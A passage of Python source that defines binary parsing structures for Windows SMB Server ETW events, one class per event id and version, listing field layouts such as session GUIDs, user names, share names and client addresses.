"SessionGUID" / Guid,
"ConnectionGUID" / Guid,
"Status" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=551, version=1)
class Microsoft_Windows_SMBServer_551_1(Etw):
pattern = Struct(
"SessionGUID" / Guid,
"ConnectionGUID" / Guid,
"Status" / Int32ul,
"TranslatedStatus" / Int32ul,
"ClientAddressLength" / Int32ul,
"ClientAddress" / Bytes(lambda this: this.ClientAddressLength),
"SessionId" / Int64ul,
"UserNameLength" / Int16ul,
"UserName" / Bytes(lambda this: this.UserNameLength),
"ClientNameLength" / Int16ul,
"ClientName" / Bytes(lambda this: this.ClientNameLength)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=551, version=2)
class Microsoft_Windows_SMBServer_551_2(Etw):
pattern = Struct(
"SessionGUID" / Guid,
"ConnectionGUID" / Guid,
"Status" / Int32ul,
"TranslatedStatus" / Int32ul,
"ClientAddressLength" / Int32ul,
"ClientAddress" / Bytes(lambda this: this.ClientAddressLength),
"SessionId" / Int64ul,
"UserNameLength" / Int16ul,
"UserName" / Bytes(lambda this: this.UserNameLength),
"ClientNameLength" / Int16ul,
"ClientName" / Bytes(lambda this: this.ClientNameLength),
"SPN" / WString,
"SPNValidationPolicy" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=552, version=0)
class Microsoft_Windows_SMBServer_552_0(Etw):
pattern = Struct(
"SessionGUID" / Guid,
"ConnectionGUID" / Guid,
"UserNameLength" / Int16ul,
"UserName" / Bytes(lambda this: this.UserNameLength),
"DomainNameLength" / Int16ul,
"DomainName" / Bytes(lambda this: this.DomainNameLength)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=553, version=0)
class Microsoft_Windows_SMBServer_553_0(Etw):
pattern = Struct(
"SessionGUID" / Guid,
"ConnectionGUID" / Guid,
"BindingSessionGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=554, version=0)
class Microsoft_Windows_SMBServer_554_0(Etw):
pattern = Struct(
"SessionGUID" / Guid,
"Reason" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=555, version=0)
class Microsoft_Windows_SMBServer_555_0(Etw):
pattern = Struct(
"SessionGUID" / Guid,
"InvalidateSession" / Int8ul,
"Reason" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=600, version=0)
class Microsoft_Windows_SMBServer_600_0(Etw):
pattern = Struct(
"TreeConnectGUID" / Guid,
"SessionGUID" / Guid,
"ConnectionGUID" / Guid,
"ShareGUID" / Guid,
"ShareNameLength" / Int16ul,
"ShareName" / Bytes(lambda this: this.ShareNameLength),
"ScopeNameLength" / Int16ul,
"ScopeName" / Bytes(lambda this: this.ScopeNameLength),
"ShareProperties" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=601, version=0)
class Microsoft_Windows_SMBServer_601_0(Etw):
pattern = Struct(
"TreeConnectGUID" / Guid,
"SessionGUID" / Guid,
"ConnectionGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=602, version=0)
class Microsoft_Windows_SMBServer_602_0(Etw):
pattern = Struct(
"TreeConnectGUID" / Guid,
"SessionGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=603, version=0)
class Microsoft_Windows_SMBServer_603_0(Etw):
pattern = Struct(
"SessionGUID" / Guid,
"ConnectionGUID" / Guid,
"ShareNameLength" / Int16ul,
"ShareName" / Bytes(lambda this: this.ShareNameLength),
"ScopeNameLength" / Int16ul,
"ScopeName" / Bytes(lambda this: this.ScopeNameLength),
"Status" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=650, version=0)
class Microsoft_Windows_SMBServer_650_0(Etw):
pattern = Struct(
"OpenGUID" / Guid,
"TreeConnectGUID" / Guid,
"SessionGUID" / Guid,
"ConnectionGUID" / Guid,
"ShareGUID" / Guid,
"NameLength" / Int16ul,
"Name" / Bytes(lambda this: this.NameLength),
"LeaseId" / Guid,
"DesiredAccess" / Int32ul,
"SharingMode" / Int32ul,
"CreateOptions" / Int32ul,
"FileAttributes" / Int32ul,
"IsReplay" / Int8ul,
"IsResume" / Int8ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=651, version=0)
class Microsoft_Windows_SMBServer_651_0(Etw):
pattern = Struct(
"OpenGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=652, version=0)
class Microsoft_Windows_SMBServer_652_0(Etw):
pattern = Struct(
"OpenGUID" / Guid,
"TreeConnectGUID" / Guid,
"SessionGUID" / Guid,
"ConnectionGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=653, version=0)
class Microsoft_Windows_SMBServer_653_0(Etw):
pattern = Struct(
"OpenGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=654, version=0)
class Microsoft_Windows_SMBServer_654_0(Etw):
pattern = Struct(
"OpenGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=655, version=0)
class Microsoft_Windows_SMBServer_655_0(Etw):
pattern = Struct(
"OpenGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=656, version=0)
class Microsoft_Windows_SMBServer_656_0(Etw):
pattern = Struct(
"OpenGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=657, version=0)
class Microsoft_Windows_SMBServer_657_0(Etw):
pattern = Struct(
"OpenGUID" / Guid,
"AppInstanceGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=658, version=0)
class Microsoft_Windows_SMBServer_658_0(Etw):
pattern = Struct(
"FileNameLength" / Int16ul,
"FileName" / Bytes(lambda this: this.FileNameLength),
"UserNameLength" / Int16ul,
"UserName" / Bytes(lambda this: this.UserNameLength),
"ComputerNameLength" / Int16ul,
"ComputerName" / Bytes(lambda this: this.ComputerNameLength),
"ShareNameLength" / Int16ul,
"ShareName" / Bytes(lambda this: this.ShareNameLength)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=700, version=0)
class Microsoft_Windows_SMBServer_700_0(Etw):
pattern = Struct(
"ShareNameLength" / Int16ul,
"ShareName" / Bytes(lambda this: this.ShareNameLength),
"ServerNameLength" / Int16ul,
"ServerName" / Bytes(lambda this: this.ServerNameLength),
"PathNameLength" / Int16ul,
"PathName" / Bytes(lambda this: this.PathNameLength),
"CSCState" / Int32ul,
"ClusterShareType" / Int32ul,
"ShareProperties" / Int32ul,
"CaTimeOut" / Int32ul,
"ShareState" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=701, version=0)
class Microsoft_Windows_SMBServer_701_0(Etw):
pattern = Struct(
"ShareNameLength" / Int16ul,
"ShareName" / Bytes(lambda this: this.ShareNameLength),
"ServerNameLength" / Int16ul,
"ServerName" / Bytes(lambda this: this.ServerNameLength),
"PathNameLength" / Int16ul,
"PathName" / Bytes(lambda this: this.PathNameLength),
"CSCState" / Int32ul,
"ClusterShareType" / Int32ul,
"ShareProperties" / Int32ul,
"CaTimeOut" / Int32ul,
"ShareState" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=702, version=0)
class Microsoft_Windows_SMBServer_702_0(Etw):
pattern = Struct(
"ShareNameLength" / Int16ul,
"ShareName" / Bytes(lambda this: this.ShareNameLength),
"ServerNameLength" / Int16ul,
"ServerName" / Bytes(lambda this: this.ServerNameLength)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1000, version=0)
class Microsoft_Windows_SMBServer_1000_0(Etw):
pattern = Struct(
"UserNameLength" / Int16ul,
"UserName" / Bytes(lambda this: this.UserNameLength),
"DomainNameLength" / Int16ul,
"DomainName" / Bytes(lambda this: this.DomainNameLength),
"Status" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1001, version=0)
class Microsoft_Windows_SMBServer_1001_0(Etw):
pattern = Struct(
"ClientNameLength" / Int16ul,
"ClientName" / Bytes(lambda this: this.ClientNameLength),
"LogEventCount" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1002, version=0)
class Microsoft_Windows_SMBServer_1002_0(Etw):
pattern = Struct(
"ServerNameLength" / Int16ul,
"ServerName" / Bytes(lambda this: this.ServerNameLength),
"ShareNameLength" / Int16ul,
"ShareName" / Bytes(lambda this: this.ShareNameLength),
"FileNameLength" / Int16ul,
"FileName" / Bytes(lambda this: this.FileNameLength)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1003, version=0)
class Microsoft_Windows_SMBServer_1003_0(Etw):
pattern = Struct(
"ShareNameLength" / Int16ul,
"ShareName" / Bytes(lambda this: this.ShareNameLength),
"ClientNameLength" / Int16ul,
"ClientName" / Bytes(lambda this: this.ClientNameLength),
"UserNameLength" / Int16ul,
"UserName" / Bytes(lambda this: this.UserNameLength)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1003, version=1)
class Microsoft_Windows_SMBServer_1003_1(Etw):
pattern = Struct(
"ShareNameLength" / Int16ul,
"ShareName" / Bytes(lambda this: this.ShareNameLength),
"ClientNameLength" / Int16ul,
"ClientName" / Bytes(lambda this: this.ClientNameLength),
"UserNameLength" / Int16ul,
"UserName" / Bytes(lambda this: this.UserNameLength),
"ClientAddressLength" / Int32ul,
"ClientAddress" / Bytes(lambda this: this.ClientAddressLength),
"SessionID" / Int64ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1004, version=0)
class Microsoft_Windows_SMBServer_1004_0(Etw):
pattern = Struct(
"ClientNameLength" / Int16ul,
"ClientName" / Bytes(lambda this: this.ClientNameLength),
"UserNameLength" / Int16ul,
"UserName" / Bytes(lambda this: this.UserNameLength)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1004, version=1)
class Microsoft_Windows_SMBServer_1004_1(Etw):
pattern = Struct(
"ClientNameLength" / Int16ul,
"ClientName" / Bytes(lambda this: this.ClientNameLength),
"UserNameLength" / Int16ul,
"UserName" / Bytes(lambda this: this.UserNameLength),
"ClientAddressLength" / Int32ul,
"ClientAddress" / Bytes(lambda this: this.ClientAddressLength),
"SessionID" / Int64ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1005, version=0)
class Microsoft_Windows_SMBServer_1005_0(Etw):
pattern = Struct(
"ClientNameLength" / Int16ul,
"ClientName" / Bytes(lambda this: this.ClientNameLength),
"UserNameLength" / Int16ul,
"UserName" / Bytes(lambda this: this.UserNameLength)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1005, version=1)
class Microsoft_Windows_SMBServer_1005_1(Etw):
pattern = Struct(
"ClientNameLength" / Int16ul,
"ClientName" / Bytes(lambda this: this.ClientNameLength),
"UserNameLength" / Int16ul,
"UserName" / Bytes(lambda this: this.UserNameLength),
"ClientAddressLength" / Int32ul,
"ClientAddress" / Bytes(lambda this: this.ClientAddressLength),
"ExpectedDialect" / Int32ul,
"ExpectedCapabilities" / Int32ul,
"ExpectedSecurityMode" / Int32ul,
"ReceivedDialect" / Int32ul,
"ReceivedCapabilities" / Int32ul,
"ReceivedSecurityMode" / Int32ul,
"SessionID" / Int64ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1005, version=2)
class Microsoft_Windows_SMBServer_1005_2(Etw):
pattern = Struct(
"Status" / Int32ul,
"TranslatedStatus" / Int32ul,
"ClientNameLength" / Int16ul,
"ClientName" / Bytes(lambda this: this.ClientNameLength),
"UserNameLength" / Int16ul,
"UserName" / Bytes(lambda this: this.UserNameLength),
"ClientAddressLength" / Int32ul,
"ClientAddress" / Bytes(lambda this: this.ClientAddressLength),
"SessionID" / Int64ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1006, version=0)
class Microsoft_Windows_SMBServer_1006_0(Etw):
pattern = Struct(
"ShareNameLength" / Int16ul,
"ShareName" / Bytes(lambda this: this.ShareNameLength),
"SharePathLength" / Int16ul,
"SharePath" / Bytes(lambda this: this.SharePathLength),
"ClientAddressLength" / Int32ul,
"ClientAddress" / Bytes(lambda this: this.ClientAddressLength),
"UserNameLength" / Int16ul,
"UserName" / Bytes(lambda this: this.UserNameLength),
"ClientNameLength" / Int16ul,
"ClientName" / Bytes(lambda this: this.ClientNameLength),
"MappedAccess" / Int32ul,
"GrantedAccess" / Int32ul,
"ShareSecurityDescriptorLength" / Int32ul,
"ShareSecurityDescriptor" / Bytes(lambda this: this.ShareSecurityDescriptorLength),
"Status" / Int32ul,
"TranslatedStatus" / Int32ul,
"SessionID" / Int64ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1007, version=0)
class Microsoft_Windows_SMBServer_1007_0(Etw):
pattern = Struct(
"ShareNameLength" / Int16ul,
"ShareName" / Bytes(lambda this: this.ShareNameLength),
"SharePathLength" / Int16ul,
"SharePath" / Bytes(lambda this: this.SharePathLength),
"ClientAddressLength" / Int32ul,
"ClientAddress" / Bytes(lambda this: this.ClientAddressLength),
"ClientNameLength" / Int16ul,
"ClientName" / Bytes(lambda this: this.ClientNameLength)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1009, version=0)
class Microsoft_Windows_SMBServer_1009_0(Etw):
pattern = Struct(
"ClientAddressLength" / Int32ul,
"ClientAddress" / Bytes(lambda this: this.ClientAddressLength),
"ClientNameLength" / Int16ul,
"ClientName" / Bytes(lambda this: this.ClientNameLength),
"SessionId" / Int64ul,
"SessionGUID" / Guid,
"ConnectionGUID" / Guid
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1010, version=0)
class Microsoft_Windows_SMBServer_1010_0(Etw):
pattern = Struct(
"NameLength" / Int16ul,
"Name" / Bytes(lambda this: this.NameLength),
"DomainNameLength" / Int16ul,
"DomainName" / Bytes(lambda this: this.DomainNameLength),
"TransportNameLength" / Int16ul,
"TransportName" / Bytes(lambda this: this.TransportNameLength),
"TransportFlags" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1011, version=0)
class Microsoft_Windows_SMBServer_1011_0(Etw):
pattern = Struct(
"NameLength" / Int16ul,
"Name" / Bytes(lambda this: this.NameLength),
"DomainNameLength" / Int16ul,
"DomainName" / Bytes(lambda this: this.DomainNameLength),
"TransportNameLength" / Int16ul,
"TransportName" / Bytes(lambda this: this.TransportNameLength)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1012, version=0)
class Microsoft_Windows_SMBServer_1012_0(Etw):
pattern = Struct(
"ChangeType" / Int32ul,
"NetNameLength" / Int16ul,
"NetName" / Bytes(lambda this: this.NetNameLength),
"Flags" / Int32ul,
"InterfaceIndex" / Int32ul,
"Capability" / Int32ul,
"LinkSpeed" / Int64ul,
"ClientAddressLength" / Int16ul,
"ClientAddress" / Bytes(lambda this: this.ClientAddressLength)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1013, version=0)
class Microsoft_Windows_SMBServer_1013_0(Etw):
pattern = Struct(
"EndpointNameLength" / Int16ul,
"EndpointName" / Bytes(lambda this: this.EndpointNameLength),
"TransportNameLength" / Int16ul,
"TransportName" / Bytes(lambda this: this.TransportNameLength)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1014, version=0)
class Microsoft_Windows_SMBServer_1014_0(Etw):
pattern = Struct(
"EndpointNameLength" / Int16ul,
"EndpointName" / Bytes(lambda this: this.EndpointNameLength),
"TransportNameLength" / Int16ul,
"TransportName" / Bytes(lambda this: this.TransportNameLength)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1015, version=0)
class Microsoft_Windows_SMBServer_1015_0(Etw):
pattern = Struct(
"ClientNameLength" / Int16ul,
"ClientName" / Bytes(lambda this: this.ClientNameLength),
"ClientAddressLength" / Int16ul,
"ClientAddress" / Bytes(lambda this: this.ClientAddressLength),
"Status" / Int32ul,
"TranslatedStatus" / Int32ul,
"SessionID" / Int64ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1016, version=0)
class Microsoft_Windows_SMBServer_1016_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"TranslatedStatus" / Int32ul,
"RKFStatus" / Int32ul,
"TranslatedRKFStatus" / Int32ul,
"ConnectionGUID" / Guid,
"ClientNameLength" / Int16ul,
"ClientName" / Bytes(lambda this: this.ClientNameLength),
"ClientAddressLength" / Int16ul,
"ClientAddress" / Bytes(lambda this: this.ClientAddressLength),
"ShareNameLength" / Int16ul,
"ShareName" / Bytes(lambda this: this.ShareNameLength),
"UserNameLength" / Int16ul,
"UserName" / Bytes(lambda this: this.UserNameLength),
"SessionId" / Int64ul,
"FileNameLength" / Int16ul,
"FileName" / Bytes(lambda this: this.FileNameLength),
"DurableHandle" / Int8ul,
"ResilientHandle" / Int8ul,
"PersistentHandle" / Int8ul,
"ResumeKey" / Guid,
"Reason" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1017, version=0)
class Microsoft_Windows_SMBServer_1017_0(Etw):
pattern = Struct(
"DurableHandle" / Int8ul,
"ResilientHandle" / Int8ul,
"PersistentFID" / Int64ul,
"VolatileFID" / Int64ul,
"ResumeKey" / Guid,
"ShareNameLength" / Int16ul,
"ShareName" / Bytes(lambda this: this.ShareNameLength),
"FileNameLength" / Int16ul,
"FileName" / Bytes(lambda this: this.FileNameLength)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1018, version=0)
class Microsoft_Windows_SMBServer_1018_0(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"Status" / Int32ul,
"TranslatedStatus" / Int32ul,
"TaskStatus" / Int32ul,
"TranslatedTaskStatus" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1019, version=0)
class Microsoft_Windows_SMBServer_1019_0(Etw):
pattern = Struct(
"ResumeKey" / Guid,
"Status" / Int32ul,
"TranslatedStatus" / Int32ul,
"TaskStatus" / Int32ul,
"TranslatedTaskStatus" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1020, version=0)
class Microsoft_Windows_SMBServer_1020_0(Etw):
pattern = Struct(
"Command" / Int32ul,
"SessionGuid" / Guid,
"SessionId" / Int64ul,
"ConnectionGuid" / Guid,
"UserNameLength" / Int16ul,
"UserName" / Bytes(lambda this: this.UserNameLength),
"ClientNameLength" / Int16ul,
"ClientName" / Bytes(lambda this: this.ClientNameLength),
"ClientAddressLength" / Int16ul,
"ClientAddress" / Bytes(lambda this: this.ClientAddressLength),
"ShareNameLength" / Int16ul,
"ShareName" / Bytes(lambda this: this.ShareNameLength),
"FileNameLength" / Int16ul,
"FileName" / Bytes(lambda this: this.FileNameLength),
"DurationInMilliseconds" / Int64ul,
"ThresholdInMilliseconds" / Int64ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1020, version=1)
class Microsoft_Windows_SMBServer_1020_1(Etw):
pattern = Struct(
"Command" / Int32ul,
"SessionGuid" / Guid,
"SessionId" / Int64ul,
"ConnectionGuid" / Guid,
"UserNameLength" / Int16ul,
"UserName" / Bytes(lambda this: this.UserNameLength),
"ClientNameLength" / Int16ul,
"ClientName" / Bytes(lambda this: this.ClientNameLength),
"ClientAddressLength" / Int16ul,
"ClientAddress" / Bytes(lambda this: this.ClientAddressLength),
"ShareNameLength" / Int16ul,
"ShareName" / Bytes(lambda this: this.ShareNameLength),
"FileNameLength" / Int16ul,
"FileName" / Bytes(lambda this: this.FileNameLength),
"DurationInMilliseconds" / Int64ul,
"ThresholdInMilliseconds" / Int64ul,
"CtlCode" / Int32ul,
"SubCode" / Int32ul,
"TunneledControl" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1021, version=0)
class Microsoft_Windows_SMBServer_1021_0(Etw):
pattern = Struct(
"ConfiguredLmCompatibilityLevel" / Int32ul,
"DefaultLmCompatibilityLevel" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1028, version=0)
class Microsoft_Windows_SMBServer_1028_0(Etw):
pattern = Struct(
"NewDialect" / Int16ul,
"OldDialect" / Int16ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1029, version=0)
class Microsoft_Windows_SMBServer_1029_0(Etw):
pattern = Struct(
"CipherSuiteOrder" / WString
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1030, version=0)
class Microsoft_Windows_SMBServer_1030_0(Etw):
pattern = Struct(
"ServerNameLength" / Int16ul,
"ServerName" / Bytes(lambda this: this.ServerNameLength),
"ShareNameLength" / Int16ul,
"ShareName" / Bytes(lambda this: this.ShareNameLength),
"FileNameLength" / Int16ul,
"FileName" / Bytes(lambda this: this.FileNameLength),
"IsRead" / Int8ul,
"Status" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1031, version=0)
class Microsoft_Windows_SMBServer_1031_0(Etw):
pattern = Struct(
"Reason" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1032, version=0)
class Microsoft_Windows_SMBServer_1032_0(Etw):
pattern = Struct(
"Reason" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1033, version=0)
class Microsoft_Windows_SMBServer_1033_0(Etw):
pattern = Struct(
"NotificationType" / Int32ul,
"InterfaceNameLength" / Int16ul,
"InterfaceName" / Bytes(lambda this: this.InterfaceNameLength)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1034, version=0)
class Microsoft_Windows_SMBServer_1034_0(Etw):
pattern = Struct(
"FailureType" / Int32ul,
"InterfaceIndex" / Int32ul,
"Error" / Int32ul,
"DeviceNameLength" / Int16ul,
"DeviceName" / Bytes(lambda this: this.DeviceNameLength),
"ExtraInformation" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1035, version=0)
class Microsoft_Windows_SMBServer_1035_0(Etw):
pattern = Struct(
"EndpointState" / Int32ul,
"InterfaceIndex" / Int32ul,
"TransportNameLength" / Int16ul,
"TransportName" / Bytes(lambda this: this.TransportNameLength)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1036, version=0)
class Microsoft_Windows_SMBServer_1036_0(Etw):
pattern = Struct(
"InterfaceIndex" / Int32ul,
"Error" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1037, version=0)
class Microsoft_Windows_SMBServer_1037_0(Etw):
pattern = Struct(
"FailureType" / Int32ul,
"InterfaceIndex" / Int32ul,
"Error" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1038, version=0)
class Microsoft_Windows_SMBServer_1038_0(Etw):
pattern = Struct(
"FailureType" / Int32ul,
"DeviceNameLength" / Int16ul,
"DeviceName" / Bytes(lambda this: this.DeviceNameLength),
"Error" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1039, version=0)
class Microsoft_Windows_SMBServer_1039_0(Etw):
pattern = Struct(
"NotificationType" / Int32ul,
"InterfaceIndex" / Int32ul,
"NdkOperationalState" / Int16ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1040, version=0)
class Microsoft_Windows_SMBServer_1040_0(Etw):
pattern = Struct(
"NotificationType" / Int32ul,
"InterfaceIndex" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1041, version=0)
class Microsoft_Windows_SMBServer_1041_0(Etw):
pattern = Struct(
"FailureType" / Int32ul,
"RegistryValueNameLength" / Int32ul,
"RegistryValueName" / Bytes(lambda this: this.RegistryValueNameLength)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1043, version=0)
class Microsoft_Windows_SMBServer_1043_0(Etw):
pattern = Struct(
"CloseOperationDurationInMillieconds" / Int64ul,
"TransportNameLength" / Int32ul,
"TransportName" / Bytes(lambda this: this.TransportNameLength),
"EndpointShutdown" / Int8ul,
"EndpointRemoved" / Int8ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1800, version=0)
class Microsoft_Windows_SMBServer_1800_0(Etw):
pattern = Struct(
"ServerNameLength" / Int16ul,
"ServerName" / Bytes(lambda this: this.ServerNameLength),
"ShareNameLength" / Int16ul,
"ShareName" / Bytes(lambda this: this.ShareNameLength)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1801, version=0)
class Microsoft_Windows_SMBServer_1801_0(Etw):
pattern = Struct(
"ServerNameLength" / Int16ul,
"ServerName" / Bytes(lambda this: this.ServerNameLength),
"ShareNameLength" / Int16ul,
"ShareName" / Bytes(lambda this: this.ShareNameLength),
"Status" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1802, version=0)
class Microsoft_Windows_SMBServer_1802_0(Etw):
pattern = Struct(
"Status" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1803, version=0)
class Microsoft_Windows_SMBServer_1803_0(Etw):
pattern = Struct(
"DescriptorName" / WString
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1804, version=1)
class Microsoft_Windows_SMBServer_1804_1(Etw):
pattern = Struct(
"Days" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1900, version=0)
class Microsoft_Windows_SMBServer_1900_0(Etw):
pattern = Struct(
"IsTdiEnabled" / Int8ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1901, version=0)
class Microsoft_Windows_SMBServer_1901_0(Etw):
pattern = Struct(
"Status" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1902, version=0)
class Microsoft_Windows_SMBServer_1902_0(Etw):
pattern = Struct(
"AddressFamily" / Int32ul,
"NetLuid" / Int64ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1903, version=0)
class Microsoft_Windows_SMBServer_1903_0(Etw):
pattern = Struct(
"AddressFamily" / Int32ul,
"NetLuid" / Int64ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1904, version=0)
class Microsoft_Windows_SMBServer_1904_0(Etw):
pattern = Struct(
"NetLuid" / Int64ul,
"Status" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=1905, version=0)
class Microsoft_Windows_SMBServer_1905_0(Etw):
pattern = Struct(
"SessionId" / Int64ul,
"InstanceId" / Int32ul,
"Reason" / WString
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=2000, version=0)
class Microsoft_Windows_SMBServer_2000_0(Etw):
pattern = Struct(
"ReassembledEventID" / Int16ul,
"FragmentSize" / Int32ul,
"FragmentData" / Bytes(lambda this: this.FragmentSize)
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=3000, version=0)
class Microsoft_Windows_SMBServer_3000_0(Etw):
pattern = Struct(
"ClientName" / CString
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=3002, version=1)
class Microsoft_Windows_SMBServer_3002_1(Etw):
pattern = Struct(
"ClientName" / CString
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=3003, version=1)
class Microsoft_Windows_SMBServer_3003_1(Etw):
pattern = Struct(
"Days" / Int32ul
)
@declare(guid=guid("d48ce617-33a2-4bc3-a5c7-11aa4f29619e"), event_id=40000, version=0)
class Microsoft_Windows_SMBServer_40000_0(Etw):
pattern = Struct(
"ConnectionType" / Int32ul,
"PeerAddressLength" / Int32ul,
"PeerAddress" / Bytes(lambda this: this.PeerAddressLength),
"PacketSize" / Int32ul,
"PacketData" / Bytes(lambda this: this.PacketSize)
)
